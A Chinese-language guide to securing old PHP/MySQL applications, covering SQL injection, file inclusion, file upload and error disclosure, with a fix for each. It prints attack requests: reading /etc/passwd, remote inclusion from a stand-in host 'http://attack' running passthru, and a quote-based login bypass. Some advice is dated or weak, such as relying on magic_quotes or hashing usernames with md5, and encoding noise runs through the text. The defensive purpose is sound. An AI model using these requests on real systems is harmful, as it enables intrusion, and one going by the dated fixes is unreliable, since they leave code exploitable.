|
摘要:php+mysql注入的防范方法����。
-對(duì)于像where id= ‘$id‘這樣的語句,如果字段id是整數(shù)��,就一定要$id = intval($id);
-username = $username 這樣是錯(cuò)誤的�,一定要加‘,正確寫法:username=‘$username‘
-用PHP的md5加密函數(shù),不用MYSQL的MD5函數(shù)
-如果是字符型的呢�����?
我們可以先用addslashes()過濾一下�����,然后再過濾”%”和”_”.
例如:
$search = addslashes($search);
$search = str_replace("_","\_",$search);
$search = str_replace("%","\%",$search);
記得�����,可千萬別在magic_quotes_gpc=On的情況下替換\為\\,如下:
$password=str_replace("\\","\\\\",$password);
-登陸的地方��,如果是只用一個(gè)管理員管理的話�,我們可以直接對(duì)username和passwd用md5加密�,這樣就不用害怕注入技術(shù)的發(fā)展了。
Username=md5($HTTP_POST_VARS["username"]);
Passwd=md5($HTTP_POST_VARS["passwd"]);
- 包含文件
極易受攻擊的代碼片斷:
<?
//test_3.php
if(file_exists($filename))
include("$filename");
?>
這種不負(fù)責(zé)任的代碼會(huì)造成相當(dāng)大的危害����,攻擊者用如下請(qǐng)求可以得到/etc/passwd文件:
http://victim/test_3.php?filename=/etc/passwd
如果對(duì)于Unix版的PHP(Win版的PHP不支持遠(yuǎn)程打開文件)攻擊者可以在自己開了http或ftp服務(wù)的機(jī)器上建立一個(gè)包含shell命令的文件����,如http://attack/attack.txt的內(nèi)容是<?passthru("ls /etc")?>�����,那么如下的請(qǐng)求就可以在目標(biāo)主機(jī)執(zhí)行命令ls /etc:
http://victim/test_3.php?filename=http://attack/attack.txt
攻擊者甚至可以通過包含apache的日志文件access.log和error.log來得到執(zhí)行命令的代碼����,不過由于干擾信息太多,有時(shí)不易成功�����。
對(duì)于另外一種形式�,如下代碼片斷:
<?
//test_4.php
include("$lib/config.php");
?>
攻擊者可以在自己的主機(jī)建立一個(gè)包含執(zhí)行命令代碼的config.php文件,然后用如下請(qǐng)求也可以在目標(biāo)主機(jī)執(zhí)行命令:
http://victim/test_4.php?lib=http://attack
PHP的包含函數(shù)有include(), include_once(), require(), require_once����。如果對(duì)包含文件名變量檢查不嚴(yán)就會(huì)對(duì)系統(tǒng)造成嚴(yán)重危險(xiǎn),可以遠(yuǎn)程執(zhí)行命令��。
解決方法:
要求程序員包含文件里的參數(shù)盡量不要使用變量�,如果使用變量���,就一定要嚴(yán)格檢查要包含的文件名,絕對(duì)不能由用戶任意指定�。
如前面文件打開中限制PHP操作路徑是一個(gè)必要的選項(xiàng)。另外�,如非特殊需要,一定要關(guān)閉PHP的遠(yuǎn)程文件打開功能�����。修改php.ini文件:
allow_url_fopen = Off
重啟apache�。
- 文件上傳
php的文件上傳機(jī)制是把用戶上傳的文件保存在php.ini的upload_tmp_dir定義的臨時(shí)目錄(默認(rèn)是系統(tǒng)的臨時(shí)目錄,如:/tmp)里的一個(gè)類似phpxXuoXG的隨機(jī)臨時(shí)文件���,程序執(zhí)行結(jié)束����,該臨時(shí)文件也被刪除�。PHP給上傳的文件定義了四個(gè)變量:(如form變量名是file���,而且register_globals打開)
$file #就是保存到服務(wù)器端的臨時(shí)文件(如/tmp/phpxXuoXG )
$file_size #上傳文件的大小
$file_name #上傳文件的原始名稱
$file_type #上傳文件的類型
推薦使用:
$HTTP_POST_FILES[‘file‘][‘tmp_name‘]
$HTTP_POST_FILES[‘file‘][‘size‘]
$HTTP_POST_FILES[‘file‘][‘name‘]
$HTTP_POST_FILES[‘file‘][‘type‘]
這是一個(gè)最簡單的文件上傳代碼:
<?
//test_5.php
if(isset($upload) && $file != "none") {
copy($file, "/usr/local/apache/htdocs/upload/".$file_name);
echo "文件".$file_name."上傳成功�!點(diǎn)擊<a href=\"$PHP_SELF\">繼續(xù)上傳</a>";
exit;
}
?>
<html>
<head>
<title>文件上傳</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#FFFFFF">
<form enctype="multipart/form-data" method="post">
上傳文件:
<input type="file" name="file" size="30">
<input type="submit" name="upload" value="上傳">
</form>
</body>
</html>
這樣的上傳代碼存在讀取任意文件和執(zhí)行命令的重大問題����。
下面的請(qǐng)求可以把/etc/passwd文檔拷貝到web目錄/usr/local/apache/htdocs/test(注意:這個(gè)目錄必須nobody可寫)下的attack.txt文件里:
http://victim/test_5.php?upload=1&file=/etc/passwd&file_name=attack.txt
然后可以用如下請(qǐng)求讀取口令文件:
http://victim/test/attack.txt
攻擊者可以把php文件拷貝成其它擴(kuò)展名���,泄漏腳本源代碼。
攻擊者可以自定義form里file_name變量的值����,上傳覆蓋任意有寫權(quán)限的文件。
攻擊者還可以上傳PHP腳本執(zhí)行主機(jī)的命令����。
解決方法:
PHP-4.0.3以后提供了is_uploaded_file和move_uploaded_file函數(shù),可以檢查操作的文件是否是用戶上傳的文件�,從而避免把系統(tǒng)文件拷貝到web目錄。
使用$HTTP_POST_FILES數(shù)組來讀取用戶上傳的文件變量��。
嚴(yán)格檢查上傳變量�。比如不允許是php腳本文件。
把PHP腳本操作限制在web目錄可以避免程序員使用copy函數(shù)把系統(tǒng)文件拷貝到web目錄��。move_uploaded_file不受open_basedir的限制���,所以不必修改php.ini里upload_tmp_dir的值�。
把PHP腳本用phpencode進(jìn)行加密,避免由于copy操作泄漏源碼���。
嚴(yán)格配置文件和目錄的權(quán)限���,只允許上傳的目錄能夠讓nobody用戶可寫。
對(duì)于上傳目錄去掉PHP解釋功能��,可以通過修改httpd.conf實(shí)現(xiàn):
<Directory /usr/local/apache/htdocs/upload>
php_flag engine off
#如果是php3換成php3_engine off
</Directory>
重啟apache���,upload目錄的php文件就不能被apache解釋了�����,即使上傳了php文件也沒有問題��,只能直接顯示源碼��。
- sql_inject
如下的SQL語句如果未對(duì)變量進(jìn)行處理就會(huì)存在問題:
select * from login where user=‘$user‘ and pass=‘$pass‘
攻擊者可以用戶名和口令都輸入1‘ or 1=‘1繞過驗(yàn)證���。
不過幸虧PHP有一個(gè)默認(rèn)的選項(xiàng)magic_quotes_gpc = On,該選項(xiàng)使得從GET, POST, COOKIE來的變量自動(dòng)加了addslashes()操作��。上面SQL語句變成了:
select * from login where user=‘1\‘ or 1=\‘1‘ and pass=‘1\‘ or 1=\‘1‘
從而避免了此類sql_inject攻擊�����。
對(duì)于數(shù)字類型的字段����,很多程序員會(huì)這樣寫:
select * from test where id=$id
由于變量沒有用單引號(hào)擴(kuò)起來,就會(huì)造成sql_inject攻擊���。幸虧MySQL功能簡單��,沒有sqlserver等數(shù)據(jù)庫有執(zhí)行命令的SQL語句��,而且PHP的mysql_query()函數(shù)也只允許執(zhí)行一條SQL語句�����,所以用分號(hào)隔開多條SQL語句的攻擊也不能奏效��。但是攻擊者起碼還可以讓查詢語句出錯(cuò)��,泄漏系統(tǒng)的一些信息��,或者一些意想不到的情況��。
解決方法:
要求程序員對(duì)所有用戶提交的要放到SQL語句的變量進(jìn)行過濾�����。
即使是數(shù)字類型的字段����,變量也要用單引號(hào)擴(kuò)起來,MySQL自己會(huì)把字串處理成數(shù)字����。
在MySQL里不要給PHP程序高級(jí)別權(quán)限的用戶,只允許對(duì)自己的庫進(jìn)行操作�����,這也避免了程序出現(xiàn)問題被 SELECT INTO OUTFILE ... 這種攻擊�����。
- 警告及錯(cuò)誤信息
PHP默認(rèn)顯示所有的警告及錯(cuò)誤信息:
error_reporting = E_ALL & ~E_NOTICE
display_errors = On
在平時(shí)開發(fā)調(diào)試時(shí)這非常有用���,可以根據(jù)警告信息馬上找到程序錯(cuò)誤所在�����。
正式應(yīng)用時(shí)�����,警告及錯(cuò)誤信息讓用戶不知所措���,而且給攻擊者泄漏了腳本所在的物理路徑,為攻擊者的進(jìn)一步攻擊提供了有利的信息�����。而且由于自己沒有訪問到錯(cuò)誤的地方��,反而不能及時(shí)修改程序的錯(cuò)誤��。所以把PHP的所有警告及錯(cuò)誤信息記錄到一個(gè)日志文件是非常明智的���,即不給攻擊者泄漏物理路徑���,又能讓自己知道程序錯(cuò)誤所在。
修改php.ini中關(guān)于Error handling and logging部分內(nèi)容:
error_reporting = E_ALL
display_errors = Off
log_errors = On
error_log = /usr/local/apache/logs/php_error.log
然后重啟apache���,注意文件/usr/local/apache/logs/php_error.log必需可以讓nobody用戶可寫���。
|
